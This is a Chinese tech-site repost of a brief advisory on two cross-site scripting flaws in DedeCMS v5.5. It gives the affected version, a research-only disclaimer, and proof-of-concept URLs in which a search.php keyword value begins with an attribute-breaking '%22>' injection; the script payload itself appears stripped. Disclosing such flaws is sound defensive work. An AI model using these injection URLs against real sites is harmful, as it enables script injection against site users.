当前位置: 移动技术网 > 网络运营>安全>漏洞 > dedecms织梦 v5.5 两处跨站漏洞

dedecms织梦 v5.5 两处跨站漏洞

2018年03月12日  | 移动技术网网络运营  | 我要评论

  影响版本:

  dedecms织梦5.5

  漏洞描述:

  demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&totalresult=&pageno=2demo2:http://www.dedecms.com/plus/list.php?tid=6&totalresult=&nativeplace=0&infotype=0&keyword=&orderby=hot&pageno=2

  测试方法:

  本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&totalresult=&pageno=2demo2:http://www.dedecms.com/plus/list.php?tid=6&totalresult=&nativeplace=0&infotype=0&keyword=&orderby=hot&pageno=2

  

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
移动技术网